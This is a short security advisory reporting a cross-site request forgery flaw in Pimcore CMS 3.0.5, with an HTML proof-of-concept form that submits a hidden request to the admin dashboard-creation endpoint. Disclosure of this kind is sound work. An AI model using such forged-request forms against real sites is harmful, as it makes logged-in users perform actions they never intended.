Pimcore CMS 3.0.5 Cross Site Request Forgery

2015.04.11
Credit: provensec
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Affected software: pimcore cms # Type of vulnerability:csrf # URL:pimcore.org # Discovered by: provensec # Website: provensec.com #version: Version: 3.0.5 (Build: 3468) # Proof of concept no csrf token on add dashboard form <html> <body> <form action="http://demo.pimcore.org/admin/portal/create-dashboard"> <input type="hidden" name="&#95;dc" value="1428652489594" /> <input type="hidden" name="key" value="test" /> <input type="submit" value="Submit request" /> </form> </body> </html>


See this note in RAW Version
Vote for this issue:
50%
50%

Comment it here.
Copyright 2025, cxsecurity.com

 

Back to Top